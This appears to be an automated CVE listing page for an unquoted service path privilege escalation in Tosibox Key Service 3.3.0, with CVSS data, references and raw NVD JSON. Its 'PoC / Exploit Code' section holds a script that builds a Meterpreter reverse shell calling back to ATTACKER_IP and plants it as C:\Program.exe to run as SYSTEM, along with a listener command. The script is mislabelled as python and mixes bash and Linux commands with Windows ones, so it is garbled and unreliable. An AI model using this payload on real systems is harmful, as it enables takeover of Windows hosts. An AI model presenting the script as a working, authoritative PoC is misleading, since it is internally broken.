CVE-2024-58315

Description

Tosibox Key Service 3.3.0 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated system privileges. Attackers can exploit the service startup process by inserting malicious code in the system root path, enabling unauthorized code execution during application startup or system reboot.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tosi:tosibox_key:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tosibox Key Service 3.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash # CVE-2024-58315 PoC - Unquoted Service Path Exploitation # Target: Tosibox Key Service 3.3.0 # Author: VulnCheck ([email protected]) TARGET_PATH="C:\\Program Files\\Tosibox\\Key Service\\TosiboxKeyService.exe" MALICIOUS_EXE="C:\\Program.exe" PAYLOAD="C:\\\\Windows\\\\Temp\\\\shell.exe" echo "[+] Checking if target service exists..." sc query "Tosibox Key Service" >/dev/null 2>&1 if [ $? -ne 0 ]; then echo "[-] Target service not found" exit 1 fi echo "[+] Checking current privileges..." whoami echo "[+] Current user context: $(whoami)/$(id -u)" echo "[+] Checking for unquoted service path..." sc qc "Tosibox Key Service" | grep BINARY_PATH echo "[+] Vulnerability confirmed if path contains spaces without quotes" echo "[+] Creating malicious executable at: $MALICIOUS_EXE" # Generate reverse shell payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o "$PAYLOAD" cp "$PAYLOAD" "$MALICIOUS_EXE" echo "[+] Payload deployed. Waiting for service restart..." echo "[+] Service will execute Program.exe with SYSTEM privileges" echo "[+] Start listener: msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST ATTACKER_IP; set LPORT 4444; exploit'" # Note: This PoC demonstrates the vulnerability concept # Actual exploitation requires: # 1. Write access to C:\\ drive root # 2. Service restart/reboot trigger # 3. Appropriate payload generation

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58315
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58315
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58315/
[4] VulDB https://vuldb.com/cve/CVE-2024-58315
[5] https://packetstormsecurity.com/files/177260/
[6] https://www.tosi.net/
[7] https://www.vulncheck.com/advisories/tosibox-key-service-local-privilege-escalation-via-unquoted-service-path
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5812.php
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5812.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58315", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:48.700", "lastModified": "2026-01-16T19:16:15.497", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tosibox Key Service 3.3.0 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated system privileges. Attackers can exploit the service startup process by inserting malicious code in the system root path, enabling unauthorized code execution during application startup or system reboot."}, {"lang": "es", "value": "Tosibox Key Service 3.3.0 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales no privilegiados ejecutar código potencialmente con privilegios de sistema elevados. Los atacantes pueden explotar el proceso de inicio del servicio insertando código malicioso en la ruta raíz del sistema, lo que permite la ejecución de código no autorizado durante el inicio de la aplicación o el reinicio del sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tosi:tosibox_key:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3.0", "matchCriteriaId": "7FDA22F3-6307-4016-B024-07BDAE6C2ABA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://packetstormsecurity.com/files/177260/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.tosi.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tosibox-key-service-local-privilege-escalation-via-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5812.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5812.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}